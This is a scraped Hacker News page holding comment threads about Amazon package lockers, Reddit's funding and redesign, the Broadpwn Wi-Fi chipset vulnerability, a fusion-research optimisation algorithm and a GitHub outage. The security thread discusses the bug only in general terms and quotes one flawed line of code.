bschwindHN 4 days ago 0 replies      
Here's a video demonstrating this kind of system in Japan:


The cool thing is when you scan in with an IC card, the lobby door will notify you of the package. That same IC card also lets me unlock my door and open the delivery locker. There's also a panel in my room which lights up when a package is sitting in the locker for me.

jk2323 4 days ago 1 reply      
Old news. They have this already in China and they have something similar in Germany. In Fact, AFAIK they even had something like this in the former GDR.
losteverything 4 days ago 0 replies      
It says from any carrier.

To receive from the usps, among other things, you must have an address, a approved mail receptacle and a safe and secure location.

The "space" in the mailbox is protected and is virtually owned by the usps.

I could not deliver to a box that is not postal approved. I suspect the missing piece of info is an agent would have to palce a parcel into a Hub locker. Like the ups store does today.

43224gg252 4 days ago 2 replies      
So... a mailbox?
plumeria 4 days ago 0 replies      
Who do they charge for this service? The retailer, the delivery company, the landlord, or the end consumer?
ikeboy 4 days ago 1 reply      
I'm hopeful this will improve deliverability - amazon sellers have noticed recently an increase in items returned because "shipping address undeliverable", and amazon forces us to eat the shipping cost - often on items delivered by Amazon themselves (amazon logistics).
djhworld 4 days ago 0 replies      
I suppose if you live in a block of flats, this would be useful.

I tend to use Amazon Lockers a lot anyway, there's one just outside my tube station (Transport for London let Amazon put one there, which I thought was smart)

otto_ortega 4 days ago 0 replies      
I got a chance to try Amazon Lockers recently while on a trip in Seattle, I can't say anything but good things.

It is very convenient not having to worry about if there will be someone at the time they try to deliver your package or that they just drop it around so it could get lost (specially if it is something expensive)

At least with Amazon Lockers they give you 3 days to pick the package and return it after that, I assume they can do something similar with these, after 3 days packages are returned to the nearest carrier retail outlet.

eli 4 days ago 0 replies      
Seems like UPS Access Point and whatever the equivalent FedEx program is called already mostly solve this for me.

If I'm not home, UPS leaves the package at a nearby participating business (which you can select from a list online if you wish). I picked a check cashing place that's already on my walk home. It's free and they'll hold packages for something like two weeks.

I guess YMMV if you're not in an urban center.

paulcole 4 days ago 0 replies      
They could OCR all the return addresses and figure out who's buying what and target ads accordingly. They could also x-ray all the packages for even more insight into consumer behavior. And if a package is coming from a competitor, offer the recipient the option to receive an Amazon gift card in exchange for refusing delivery and returning to sender. Or just paste Amazon ads all over every package in the Hub. Yes I work in marketing why do you ask.
madamelic 4 days ago 2 replies      
I am kind of waiting for the day Amazon gets hit with an anti-trust or something.

Amazon is nice, but a bit tired of Amazon's attempt to collect everyone's data about everything.

justicezyx 4 days ago 2 replies      
Amazon is reinventing the whole daily retailing experience piece by piece.

There does not seem anyone on the market now can be a meaningful competitor at all. The close-loop virtuous cycle now extends to a degree that probably only Alibaba can rival (in China).

I don't think this is Bezos' original vision, but Amazon grows to a point such ideas just come out naturally.

The resistance seems futile now, all retailers should consider how to operate in the model created by Amazon.

gist 3 days ago 0 replies      
Where this will end up is that Amazon will figure out a way to put these at private residential homes [1] and the property owners will be able to earn extra cash. Won't work in all places or on all types of properties but I can definitely see it being possible in certain locations.

[1] After figuring out how to defeat any zoning issues.

glenneroo 4 days ago 0 replies      
What's wrong with the "pick-up stations" option? I have a list of 9 different places (post office, gas station, optician, pizzeria, drug store, etc.) within 15-minute walking/transit distance which I can select to have my stuff delivered. Alternately I can enter a neighbor's name/address or select a safe place. Is this only an option in Europe?
tapmap 4 days ago 0 replies      
Isn't there a startup out there that will pick up your packages for you when you're out? Or will allow your neighbour to pick them up?
voltagex_ 4 days ago 0 replies      
AusPost has Parcel Lockers which are fantastic, except they won't accept courier deliveries, only "standard" packages (USPS, Royal Mail, Auspost itself). I get a push notification and an SMS. There's a QR code in the app which is used to open the door to the locker.

Strangely, I got two DHL packages recently so maybe they've changed the rules.

samcat116 4 days ago 0 replies      
We have had a similar product at my University for the past two years. I honestly couldnt imagine college without it. I have little faith that my residential office could manage that many packages. Plus free next day pickup for most things on Amazon is amazing. Order by 10pm and its there at 8am the next day.
chiph 4 days ago 0 replies      
I'm wondering how anti-theft these are. I (and my neighbors) just lost some mail because some thieves pried open the cluster mailbox. I imagine these would be a really attractive target.
jageen 4 days ago 0 replies      
Rakuten introduce same kind of service in 2014,Where you can set your password to unlock box.


19890903 4 days ago 0 replies      
There aren't enough companies doing USEFUL hardware. To see such a handy tool from Amazon is a breath of fresh air. What are some useful hardware companies that you can think of?
Nerada 4 days ago 1 reply      
Pretty much Australia Post's Parcel Lockers.


TranquilMarmot 4 days ago 0 replies      
Isn't this just Amazon Locker? There are ton of them here in Seattle, one right next door to me. Biggest issue is the thing is ALWAYS full so I can never actually get anything shipped to it.
alexobenauer 4 days ago 2 replies      
Wildly unnecessary. Apartment complexes have mailbox systems where they leave a one-time key in your mailbox to a special package-sized box. No touchscreen or Amazon needed.
devdoomari 4 days ago 0 replies      
well there's a convenient-store version of this in Korea...

which is a +1 for the convenient store (more ppl coming in -- more chance to sell stuff)and +1 for the buyer

sixQuarks 4 days ago 1 reply      
Amazon needs to solve the cardboard box overload issue. Too many boxes to break down all the time, and sometimes overfilling the bin.
empath75 4 days ago 1 reply      
Every apartment I've ever lived at just has deliveries left at the leasing office. It seems like it works fine.
chw9e 4 days ago 0 replies      
If these things supported refrigeration it would be pretty convenient for future deliveries from Whole Foods
banach 4 days ago 0 replies      
Oh, they mean a "mail box".
cargo8 4 days ago 2 replies      
Is this just Amazon Locker rebranded?
felipesabino 4 days ago 0 replies      
[off-topic] Anyone else really annoyed by the buggy scroll making the page jump up and down?
quickthrower2 4 days ago 0 replies      
My solution is to tell them to leave it round the back, under the verandah
arxpoetica 4 days ago 0 replies      
Something like this for international shipments would be awesome.
odiroot 4 days ago 0 replies      
I think we already have it here in Germany, if I understand correctly. DHL is always experimenting with new ways to avoid ringing your doorbell.
homero 4 days ago 0 replies      
How's it get your email?
e40 4 days ago 0 replies      
Not new, and I tried to use it several times, and the boxes at the 7-11 near my house are never free.
orliesaurus 4 days ago 0 replies      
What's next? Amazon Buses to get you to work?
2_listerine_pls 4 days ago 0 replies      
I hate Amazon. These guys want to control every aspect of the chain.
nightski 4 days ago 2 replies      
Wow that looks like an example of over engineering if I have ever seen one. USPS has been using a simple key system for ages.
Reddit raises $200M at a $1.8B valuation recode.net
383 points by snew  22 hours ago   395 comments top 47
stevenj 21 hours ago 46 replies      
>the company is literally re-writing all of its code


>An early version of the new design, which we saw during our interview, looks similar to Facebooks News Feed or Twitters Timeline: A never-ending feed of content broken up into cards with more visuals to lure people into the conversations hidden underneath.

>We want Reddit to be more visually appealing, he explained, so when new users come to Reddit they have a better sense of whats there, what its for.

I fear this major re-design will be a mistake. HN is designed similarly to Reddit and if HN ever tried to do a major re-design, I think I would visit it less. I keep coming back to it because of its stories, comments, and its simplicity and minimalism. It has good content and is very easy to use and navigate.

t0mbstone 19 hours ago 5 replies      
If you are going to re-design a site like reddit, your best bet is to keep the old version in place, but allow people to also view all of the same content in the "new" design.

For example, release the new design on new.reddit.com and let viewers migrate over to it at their own pace.

Once you have a lot of people using the new reddit instead of the old design, you can migrate the old reddit to old.reddit.com and put the new design up as the default.

WHATEVER YOU DO, DON'T GET RID OF THE CURRENT DESIGN, until you have adoption for the new design. Period. If you simply replace the old with the new, reddit is as good as dead.

koolba 21 hours ago 6 replies      
> Still, he says making money is not our top priority, estimating the company spends only about 20 percent of its resources on its advertising business. Huffman declined to share revenue totals. The company is also not profitable.

I can't imagine giving $200M to a group of people who publicly say they're not focused on ensuring I get it back. Is this a VC investment or a charity?

Also, have they not achieved profitability after 10+ years because they don't know how to make enough money (i.e. ad sales team is weak), costs are too high (i.e. bad code so lots of infra or too many employees), or is it just not possible to be profitable in this space?

Chardok 20 hours ago 2 replies      
I am of the opinion that trying to turn a profit on something like Reddit is a catch 22.

The concept of Reddit, which is user generated content curated by users, doesn't have a lot of need for a middleman, more of just a few moderators and admins to keep everything running smoothly. The power of the website is solely in its users and their content generation.

Unfortunately these slow changes have been eroding what was Reddit's strengths of free speech and open dialogue by turning the site into "advertisement friendly". That means killing all subreddits that could sour potential buyers and altering vote-counts to favor specific messages.

Combine this with the fact that they are supplanting viral marketing disguised as user posts (One from today even! https://www.reddit.com/r/gaming/comments/6ql2tu/made_my_deli...), allowing blatant vote manipulations (https://www.forbes.com/sites/jaymcgregor/2016/12/14/how-we-b...) or allowing entire takeovers (/r/politics during election cycle - hello CTR!) and you have a bloated replica of something that used to be an amazing social powered website.

rdtsc 11 hours ago 6 replies      
I don't understand this. Anyone remember a time when companies used their developers to update their site without having to raise hundreds of millions of dollars?

> An early version of the new design, which we saw during our interview, looks similar to Facebooks News Feed or Twitters Timeline:

So they will look like Facebook. Because nothing says cool and trendy like the social site your parents and aunts and uncles use. Now nothing wrong with aunts and uncles using the site, it's just that "fresh" and "cool" aren't exactly the first things that come to mind there.

> The company has about 230 employees, up from around 140 at the beginning of the year. Huffman would like to end 2017 with around 300 full-time staff.

That sounds odd too me as well, maybe I am not versed in startup culture. Having a goal of going from 230 to 300 people seems like a pointless metric (and wasteful). It's like saying "I want to write 1000 lines of code today".

I haven't seen much mentioned about moderation and admins and how they censor and manipulate content and talk about fostering better communities and so on.

> Eventually, though, Altman and Reddits other investors will want their money back and then some. Huffman says there are lots of ways for Reddit to exit, none of which hes focused on at the moment.

Well there is the answer. They are trying to sell it. "Hey, Psst! Wanna buy this cool site for $2B. It looks fresh like Facebook, and we just grew by 30% (230 to 300 employees) in the last few months. Close your eyes and imagine that hockey stick graph going up, and the value you'd be getting out of it".

SirensOfTitan 18 hours ago 3 replies      
Within the context of redesigns I think there exists some value in looking at Facebook's failed card-based redesign back in 2013:


Essentially this big, beautiful design driven redesign ultimately never shipped because users spent less time on it. Certain design 'improvements' like increased padding between stories reduces density and as a result tends to reduce readership, for example. The internet as perceived by Engineers and Designers is quite different from the masses (even with Reddit's demographic differences from FB taken into account).

Reddit needs to be really careful with a redesign: data should lead the rollout efforts, not design. I think they are due for some UX improvements, perhaps around a gradual UI refresh; however, I have little faith in the product leadership at Reddit to pull this off. Huffman and crew need to be willing to can the entire redesign if user research and data come back negative.

huebnerob 21 hours ago 2 replies      
Frankly, I love Reddit. If you pick and choose the right communities, it can be an amazing resource for everything from tech discussions, to local news, to emotional support. However, I will strongly agree with the perception problem, there's also a lot of bad on Reddit and its structure as a series of echo chambers doesn't help.
arca_vorago 19 hours ago 0 replies      
Good. Its about time for reddit to wither enough for a more user focused platform yo take it place.

Its the ol model I see time and time again. Site pulls in users by being generally awesome and doing things like not advertising, not censoring, etc. Then the site grows. Businesses start astroturfing because they can't advertise. Then the company slowly starts walking back on everything that made it special, for example, advertising, all while rapidly expanding the personell while hardly doing anything to improve the site for users. Aaaand right when advertising dollars are the best, try to capitalize or take public, followed by a big sale/buyout, and finally within finite time users feel betrayed and it withers and dies, but not until a competitor starts where they did, and usually follows the same path.

I stopped participating in reddit about the time sockpuppetry really started killing my favorite sub's, and personally I think the first and most greiveous mistake was moving away from text only.

The problem as it stands is none of the competitors stand out. I think hn is best, but scope is limited, /. does something's interesting but failed and lost its user base. Voat is too much of a reddit clone, and I just don't get the appeal of steemit etc.

Personally, we need to sit down and figure a better way to measure user worth. Right now I am leaning to a Slashdot style moderation/tagging system, along with a limited input per user at varying thresholds. Something that really interests be is automating logical maps of comments too.

asb 20 hours ago 4 replies      
The announcement on Reddit also says they are changing their privacy policy to remove support for 'Do Not Track' https://www.reddit.com/r/announcements/comments/6qptzw/with_...
annexrichmond 21 hours ago 0 replies      
> Huffmans plan for the new funding includes a redesign of reddit.com the company is literally re-writing all of its code, some of which is more than a decade old. An early version of the new design, which we saw during our interview, looks similar to Facebooks News Feed or Twitters Timeline: A never-ending feed of content broken up into cards with more visuals to lure people into the conversations hidden underneath.

this sounds risky for a couple reasons. I hope this is a bit hyperbolic and they are only referring to the frontend. But anyway: rewriting everything from scratch is a monumental undertaking and can delay other important enhancements. Rewriting everything partially contributed to Netscape falling behind its competitors[1] and eventually to its irrelevance. The other reason it is risky is that maybe the site's simple and functional design is what made them so successful in the first place?

[1] https://www.joelonsoftware.com/2000/04/06/things-you-should-...

virtualized 21 hours ago 3 replies      
But.. but I began to like Reddit. Now they want to take it away from me by destroying it.

> Its going on a hiring spree


> redesigning its website

For no reason other than giving the unnecessary people from the hiring spree something to do.

> Huffman would like to end 2017 with around 300 full-time staff

The current number of 230 employees is already about ten times too many. What the hell do they need the additional staff for?

> The company is also not profitable.

Doesn't need to be because it could be run by ten people living off of donations.

wiremine 21 hours ago 1 reply      
Seen a few comments focus on the "redesign" and comparisons to Digg, and wanted to add a few comments:

1. People may forget, but Reddit was a (the?) major winner in the Digg exodus.

2. I don't think Digg every got the subreddit style discussion boards down. I think the reddit "homepage experience" vs. the typical subreddit experience to be very different. Should be interesting to see which way they slide for the redesign.

3. The influx of new capital and the focus on the redesign sort of telegraphs that they want to grow reddit, which is a very large but idiosyncratic community.

If they do it right, the change will be very transparent and very incremental, ala the ebay background color change [1].

Should be an interesting thing to watch!

[1] https://articles.uie.com/death_of_relaunch/

cleansy 21 hours ago 3 replies      
I would love to see reddit being more like a wikipedia than a facebook. If they cut the sales team out and ask for donations like WP does, they would do just fine. I was on reddit before I was registered on FB and quite frankly I love reddit.com way more than FB for many reasons. It's a shame that they go down the hypergrowth-unicorn model.
spike021 21 hours ago 2 replies      
>An early version of the new design, which we saw during our interview, looks similar to Facebooks News Feed or Twitters Timeline: A never-ending feed of content broken up into cards with more visuals to lure people into the conversations hidden underneath.

Not sure why this UX concept needs to be applied to every kind of interface nowadays.

I think Reddit's current interface could be updated visually without changing its simplicity.

bionoid 6 hours ago 0 replies      
Looking past the visual design, I think a more pressing question is what will happen to the API? From my perspective, it is Reddit's saving grace. It bridges the gap between available functionality and what moderators and users actually need. I personally run about ~30kloc of Python code against reddit 24/7, mostly to aid moderation of subreddits. This codebase has grown organically over the years, and truth be told, a major API change will require a major investment in my end. That is my own fault, for sure, but I know several other developers in the same boat.

Breaking the API will take away essential functionality from a very wide range of communities, moderators and users alike. Can they do a complete front- and back-end rewrite and still maintain a backwards-compatible API? If not, I am out, because a rewrite is simply way too much work.

edit: typo

vlunkr 10 hours ago 1 reply      
Honestly, how do you monetize Reddit? I'm curious what ideas they supposedly have. The crowd is too tech savvy to just throw more ads on it. They run ad blockers, and if you get aggressive like news sites do, the exodus will begin. It just seems like a community with little loyalty to the site itself, and distrust of obvious commercialization.
Invictus0 19 hours ago 0 replies      
I couldn't imagine a more futile investment. Reddit users are notoriously combatant. Ads on reddit have extraordinarily low CTRs. After bumbling around for the last ten years, reddit still doesn't know dollars from doge and is burning cash on ridiculous side projects like its gift exchange and its (already discontinued) entrepreneurship mini-series.
naturalgradient 21 hours ago 0 replies      
I hope this redesign does not turn into a LinkedIn style disaster. Sometimes I wonder if these redesigns happen not for some well-argued business purpose but for overinflated departments having to justify their existence (which I strongly suspected in the case of LinkedIn's redesign which made the site unusable for months).
aerovistae 12 hours ago 0 replies      
strgrd 19 hours ago 0 replies      
Reddit, after the great Digg exodus:

> You chose to grow with venture capital and youve no doubt (I hope) taken some money off the table in your Series C round. I say this because this new version of digg reeks of VC meddling. Its cobbling together features from more popular sites and departing from the core of digg, which was to give the power back to the people.

lettergram 20 hours ago 0 replies      
For reference, I feel the reddit post is significantly better:


rocky1138 21 hours ago 1 reply      
A company as old as Reddit should be profitable.
mevile 21 hours ago 0 replies      
I think Reddit is on track to becoming hugely successful and completely irrelevant.
jumpkickhit 19 hours ago 0 replies      
That's seems like a very low valuation for a site that heavily trafficked.

What is their average time-on-site statistic I wonder, i'd expect it to be much higher than most other websites.

idlewords 18 hours ago 3 replies      
Can anybody name a successful ground-up redesign of a popular website? Or a successful from-scratch rewrite of a heavily used codebase?
romanovcode 5 hours ago 0 replies      
>An early version of the new design, which we saw during our interview, looks similar to Facebooks News Feed or Twitters Timeline: A never-ending feed of content broken up into cards with more visuals to lure people into the conversations hidden underneath.

So they are doing same mistakes as Digg. Interesting.

ErikVandeWater 18 hours ago 0 replies      
A lot of comments have dealt with the general idea of a redesign - but I haven't seen much on the specifics.

I would like to point out the twitter/facebook feed style as described is difficult to replicate, because with reddit, seeing the title of the post helps contextualize it so much. Without the title, many posts become meaningless because you can't guess the subreddit that the post is from - and a meme/gif in one subreddit can mean something much different than a meme in another.

ThomPete 9 hours ago 0 replies      
I hope reddit have a strategy for implementing that change gracefully and how to deal with the most noisy opponents. I have helped a lot of companies redesign their communnities/forums/products. Its a serious minefield as a lot of people will protest (but most wil cope). even small changes can throw people into revolution mode. And its most often not the actual design which will get people complaining but the change itself. going to be very interesting to see how this will play out.
scierama 20 hours ago 3 replies      
I don't get why a company who keeps the entire Internet talking on a daily basis is only worth less than $2B but a company that lets teens take snaphots and share them is worth many billions.
dcf_freak 6 hours ago 0 replies      
I don't know if this is commonplace but i'm intrigued by these valuations. Anybody have link to the actual valuation? What method was used?
neuigkeiten 5 hours ago 0 replies      
Wow, complete redesign? Sounds dangerous. Why dont they make incremental changes and ab-test the impact?
god_bless_texas 3 hours ago 0 replies      
Why does it take $200M to do these things?
zitterbewegung 20 hours ago 0 replies      
Others have commented "they are doing a Digg" and asking whats the new Reddit. The better question is do you want to be the next site to replace Reddit? I don't think social news sites are sustainable at all. Reddit used to play the game to avoid becoming Digg and keeping its user base happy. It didn't seem to be profitable or profitable enough for their investors so they are forced to broaden the user base by any means possible.
mark_l_watson 19 hours ago 0 replies      
When I talked with Alexis Ohanian (after his talk at Google), I asked him about the switch from Common Lisp years ago. I assume the rewrite will not be in CL! He is a very nice guy and his feelings for social responsibility came through nicely in his talk.

I find Reddit one of the most valuable web sites I use, covering news and tech interests. I wish them well on the infrastructure refresh.

lettergram 20 hours ago 0 replies      
Interesting. Im super worried a redesign will kill the site.

However, at the same time (after thinking about it), I can see it as a necessary step.

Without a redesign it'll be hard for them to implement a way to make money. I assume, that is also how they increased the valuation; by promising increased profits.

free2rhyme214 10 hours ago 0 replies      
I'm way more interested if they create their own digital asset than the money they raised.
fasteddie 19 hours ago 0 replies      
I'm really curious at what their cap table looks like at this point in time. With the various ownership rejiggerings by Conde Nast, and this and Sam's last round, wonder who has the power here
toephu2 12 hours ago 0 replies      
Anyone know what Reddit's DAU is? This will help us give more context as to revenue potential.
DrScump 11 hours ago 0 replies      
I want Usenet newsgroups back.
rottyguy 21 hours ago 1 reply      
surprised the valuation is so low for a top 5 destination (per alexa).
pinaceae 20 hours ago 0 replies      
well, good news for the HN community!

start your engines, reddit will do what so many user-driven content sites have done - light themselves on fire. slashdot, digg, they never learn.

yes, the network effect is a huge moat. but then you actively alienate your users and then it goes FAST.

good luck to the aspiring entrepreneurs going after this opportunity.

don't even need a strong business plan, not like you can make any real money - but you'll get funding for years to come :)

dlwdlw 21 hours ago 0 replies      
Ugh, trying to fix marketing issues with more engineering....
throw2016 18 hours ago 0 replies      
I am not sure discussion sites like Slashdot, Reddit can run or scale as businesses. And retain credibility with the majority of their users.

As founder run sites with income to sustain the site it works but the moment founders become 'distant' and obsessed with commercial objectives the site sort of loses its focus and there is a slow decline.

Reddit only took off because it as seen an low key non-commercial alternative to the 'over commercial' Digg. Now it doesn't have that feel anymore and this can only end badly.

Even HN is not a profit making site, but delivers value to ycombinator outside of that.

payne92 20 hours ago 0 replies      
Is all of the money going to the company, or is some of it going to cash out existing shareholders?
ijafri 19 hours ago 1 reply      
Either you die Young as a Digg, or live long enough to become Reddit.
hydromet 5 hours ago 1 reply      
>>the company is literally re-writing all of its code>> Wow.

Good to know they are "literally" re-writing code instead of "figuratively". Why is the adverb "literally" overused so often?

Entangled 11 hours ago 0 replies      
I came here to say something about Digg but there are already 70 references to Digg in the comments.
Remotely Compromising Android and iOS via a bug in Broadcom's WI-FI Chipsets exodusintel.com
386 points by pedro84  5 days ago   161 comments top 13
thomastjeffery 5 days ago 6 replies      
Why does Broadcom insist on proprietary drivers?

How could it possibly be detrimental for Broadcom to have free software drivers?

This article is a poignant example that it is detrimental for them to continue to keep their drivers proprietary.

Animats 5 days ago 2 replies      
C's lack of array size info strikes again:

 memcpy(current_wmm_ie, ie->data, ie->len);
where "ie" points to data obtained from the net.

yifanlu 5 days ago 2 replies      
The article mentions

> Broadpwn is a fully remote attack against Broadcoms BCM43xx family of WiFi chipsets, which allows for code execution on the main application processor in both Android and iOS.

But it doesn't go into any details on this privilege escalation actually works for iOS and more specifically that it doesn't require additional exploits. Can anyone explain this in more detail? If this actually allows code execution on iOS application processor, that means we have a jailbreak right?

swerner 5 days ago 1 reply      
Fortunately, this is being addressed in software updates.Unfortunately, people who own older devices are left with the vulnerability forever. The iPhone 4S alone sold ~60 million units (according to Wikipedia) and did not (and most likely will not) receive any updates.
shock 5 days ago 6 replies      
This is kind of scary :(. How does one ensure that they aren't vulnerable to this bug?
nyolfen 5 days ago 0 replies      
i've been hearing people complain about the seriousness of this attack vector for years. i'd be surprised if there weren't intelligence agencies that have utilized it already.
samat 5 days ago 1 reply      
Could please someone explain, 1) if firmware is stored on a Wifi chip or rather loaded during the boot process?

2) Do apple/google have binary image from Broadcom or rather source code?

It is quite interesting how this patch production/delivery process works.

IshKebab 5 days ago 0 replies      
How long until someone unleashes this? There are going to be millions of vulnerable Android phones for at least a couple of years to come. Surely it will happen.
mangix 5 days ago 1 reply      
I do wonder why most mobile chips are broadcom. There's decent competition from Qualcomm atheros and mediatek.
cpach 5 days ago 0 replies      
If anyone wonders, this was patched in iOS 10.3.3 https://threatpost.com/apple-patches-broadpwn-bug-in-ios-10-...
rca 5 days ago 0 replies      
http://boosterok.com/blog/broadpwn/ shows a simple check using hostapd to see if a device is vulnerable
amazingman 5 days ago 1 reply      
I already updated my phone. Is the iOS update that patches this available over a cell network? If not, as is usually the case, isn't that Not Good?
anon4728 5 days ago 0 replies      
Proprietary drivers, firmware blobs and ASICs are a national security threat. Without open code reviews, auditing and functional verification it's impossible to trust there are both a minimum of exploitable bugs and/or backdoors in a given software-hardware stack. This may require some sort of confidentiality rubric but there's no shortcut to getting around this vital need.
Google and a nuclear fusion company have developed a new algorithm theguardian.com
372 points by jonbaer  5 days ago   114 comments top 19
abefetterman 5 days ago 3 replies      
This is actually a really exciting development to me. (Note, what is exciting is the "optometrist algorithm" from the paper [1] not necessarily googles involvement as pitched in the guardian). Typically a day of shots would need to be programmed out in advance, typically scanning over one dimension (out of hundreds) at a time. It would then take at least a week to analyze the results and create an updated research plan. The result is poor utilization of each experiment in optimizing performance. The 50% reduction in losses is a big deal for Tri Alpha.

I can see this being coupled with simulations as well to understand sources of systematic errors, create better simulations which can then be used as a stronger source of truth for "offline" (computation-only) experiments.

The biggest challenge of course becomes interpreting the results. So you got better performance, what parameters really made a difference and why? But that is at least a more tractable problem than "how do we make this better in the first place?"

[1] http://www.nature.com/articles/s41598-017-06645-7

briankelly 5 days ago 4 replies      
From the actual journal article:

> Two additional complications arise because plasma fusion apparatuses are experimental and one-of-a-kind. First, the goodness metric for plasma is not fully established and objective: some amount of human judgement is required to assess an experiment. Second, the boundaries of safe operation are not fully understood: it would be easy for a fully-automated optimisation algorithm to propose settings that would damage the apparatus and set back progress by weeks or months.

> To increase the speed of learning and optimisation of plasma, we developed the Optometrist Algorithm. Just as in a visit to an optometrist, the algorithm offers a pair of choices to a human, and asks which one is preferable. Given the choice, the algorithm proceeds to offer another choice. While an optometrist asks a patient to choose between lens prescriptions based on clarity, our algorithm asks a human expert to choose between plasma settings based on experimental outcomes. The Optometrist Algorithm attempts to optimise a hidden utility model that the human experts may not be able to express explicitly.

I haven't read the full article nor do I understand the problem space, but the novelty seems overstated based on this. Maybe they can eventually collect metadata to automate the human intuition.

Edit: here's their formal description of it: https://www.nature.com/articles/s41598-017-06645-7/figures/2

dwaltrip 5 days ago 5 replies      
There was a talk about the state of nuclear fusion by some MIT folks linked here on HN a few days ago. One of the biggest takeaways was that many fusion efforts are very far away (3 to 6+ orders of magnitude) on the most important metric, Q, which is energy_out / energy_in. Additionally, much press and public discussion completely fail to discuss this and other core factors that actually matter for making fusion viable.

I remember Tri-alpha being listed on one of the slides near the bottom left of the plot, 4 or 5 orders of magnitude away from break even, where Q = 1 (someone please correct me if I'm remembering incorrectly).

Is the 50% improvement described in the article meaningful, as that would only be a fraction of an order of magnitude?

I understand the broader concept of combining experts and specialized software on complex problems is a powerful idea -- I'm just wondering if this specific result actually changes the game for Tri-alpha.

EternalData 5 days ago 5 replies      
Google might try to become the conglomerate of all forward-facing things but it is somewhat funny to see how through it all, it's their advertising revenues that form the core of the business.
ZenoArrow 5 days ago 0 replies      
Sounds like some promising results, hopefully this approach will continue to be useful.

Addressing the wider article, it always surprises me that the focus fusion approach is never mentioned in fusion articles put out by the mainstream media. I don't know what to attribute that to, but it's surprising that one of the most promising fusion approaches is constantly overlooked.

To give an idea how drastically overlooked focus fusion is, here's a graph showing R&D budgets for different fusion projects...


... and here's a graph showing energy efficiency of fusion devices (running on deuterium I believe)...


You'd think that the second most efficient device would've gotten more than $5 million in funding over 20 years (I think the original funding was from NASA back in 1994).

mtgx 5 days ago 1 reply      
I think their universal quantum computer (to be announced later this year) could accelerate fusion research even more, as I imagine it could more accurately simulate the atom reactions and experiments on it. Practical quantum computers may just be what we were missing to finally be able build working fusion reactors.

The millions of possible "solutions" and algorithms for working fusion reactors may be what has made fusion research so expensive and fusion reactors seem so far away. Quantum computers may be able to cut right through that hard problem, although we may have to wait a bit more until quantum computers are useful enough to make an impact on fusion research. I don't know if that's reaching 1,000 qubits or 1 million qubits.

yousefvi 5 days ago 0 replies      
As a psychologist, this looks an awful lot like computerized adaptive testing methods, only instead of estimating some parameter vector about a person, you're estimating some parameter vector about plasma.

Even the title "optometrist algorithm" is telling, because that paradigm is a basic model for how a lot of testing is done, except that it's not the optometrist doing it, it's a computer.

DrNuke 5 days ago 0 replies      
Diversification of the business, me thinks... nuclear is so big (but slow) that a penny invested today may become a tenner tomorrow, just in case.
siscia 5 days ago 7 replies      
I do have a naive question.

Suppose a big breakthrough comes out of a private company, and such innovation is necessary to use nuclear fusion.

The company will be free to do whatever it pleases with the technology or it will somehow "force" to let other use, maybe behind the payment of some royalties.

rurban 5 days ago 0 replies      
No, they have not. They developed a very useful new program.

But simple assisted hill climbing is not a new algorithm, you might call it "Wizard" though. This would attract the right audience.

janemanos 5 days ago 0 replies      
Maybe I'll see commercial fusion within my lifetime... how nice is that!
j7ake 5 days ago 1 reply      
how does this nuclear fusion company hope to make money ? Their product is decades in the future.
suzzer99 5 days ago 4 replies      
Am I the only one that never reads these articles but just goes straight to the comments? It seems like reporters always get the facts bungled and go for the simple story - out of necessity of course.
JohnJamesRambo 5 days ago 1 reply      
Google didn't enter the race. They helped a company with some calculations.
Necromant2005 5 days ago 0 replies      
It's nothing. Even if Google is invented something we will never see a product customer can purchase.
grnadav1 5 days ago 1 reply      
You jusk KNOW Elon Musk is gonna beat'em to it ;)
MrQuincle 5 days ago 4 replies      
There are two directions within the energy world that I don't completely get. One of them is hydrogen storage, the other nuclear fusion.

From what I always understood is that the high-energy neutrons produced by the fusion reaction irradiate the surrounding structure and that there is still considerable nuclear waste (although lifetimes are better than with nuclear fission). Do the scientists not care or is this outdated info?

hailmike 5 days ago 0 replies      
I want to start placing "Google and " before stating my accomplishments.

"Google and a nuclear fusion company have developed a new algorithm"

sounds way better than:

"Nuclear fusion company has developed a new algorithm using Google"

They may not mean the same, but in today's world faking it until you make it might pay off.

quickben 5 days ago 3 replies      
Outside of the title being misleading, I'm sceptical. It's one thing to have the hardware for research, and completely other to have the expertise for the research.

Google entered the self driving cars research, and we have yet to see them driven around.

This heavily reminds me of Intel and their diversification, up until recently, they were in IoT, makers market and what not. One solid push from AMD and they jumped out of everything way too fast to track.

Google seems the same with the nuclear fusion. They have the advertising money to throw around, but that just it, they are in different segment, and from investing side I'm more inclined to stay away from their stock then buy it.

GitHub was down github.com
391 points by thepumpkin1979  22 hours ago   227 comments top 31
kaikai 22 hours ago 5 replies      
I would love to see a chart of traffic to other sites when GitHub goes down. My bet is that HackerNews and Twitter both get significant spikes from all those bored developers.
alexchamberlain 21 hours ago 0 replies      
When I break our GitHub webhooks, I joke it's time for people to practice our Disaster Recovery (DR) procedures. In all seriousness, this is a good opportunity to practice work without GitHub. Any service can go down; can you deploy a critical bug fix without it? If not, why not and what can you do to fix it?
kmfrk 22 hours ago 3 replies      
I had to change a username from capitalized to uncapitalized and use my updated remote afterwards, apologies if I broke it for everyone.
_Marak_ 19 hours ago 2 replies      
If anyone is interested, I've been working with a git host that is actually distributed across a p2p network using SSB.




It's been working fairly well so far. We are using git-ssb to manage a few projects instead of putting them into Github.

slap_shot 22 hours ago 1 reply      
Status now shows Major Service Outage:

12:32 EDTMajor service outage.


luhn 22 hours ago 4 replies      
Pages Builds Failure Rate spiked to over 2000%. I don't know how that's possible, but it seems pretty bad.
relaxitup 19 hours ago 1 reply      
Do these general Github outages affect GH Pages as well, or is that service portion segmented to some degree?
rcthompson 21 hours ago 1 reply      
Looking at the status graphs, it seems like there was some clearly anomalous data starting around midnight, about 9 hours before the actual outage "began". Maybe a gradual botnet ramp-up, and 9:27 AM is when it got bad enough to overload some critical service? (Or really any other threshold-based failure scenario.)
sashk 22 hours ago 1 reply      
What was happening to Github for a week or so in late June - early July? I see "The status is still red at the beginning of the day" for a whole week.


tambourine_man 21 hours ago 6 replies      
Insert remark on why we use a centralized service for a distributed source control system, etc. No one seems to care, unfortunately
leesalminen 22 hours ago 0 replies      
I think it started as minor as I was receiving a unicorn once per 10 pages. It's currently happening on almost all.

Of course, I'm trying to dig into a WebKit issue and need the issues to load!

pmoriarty 20 hours ago 6 replies      
Where is github hosted?

Do they use AWS or another commercial cloud provider, or do they have their own servers in data centers (hopefully scattered around the globe)?

If AWS, are their services spread among multiple availability groups? I'm just wondering how this could happen.

pramodzion 21 hours ago 0 replies      
Github is back online.
Cafey 22 hours ago 0 replies      
It has leveled up to a major outage!
AlphaWeaver 18 hours ago 2 replies      
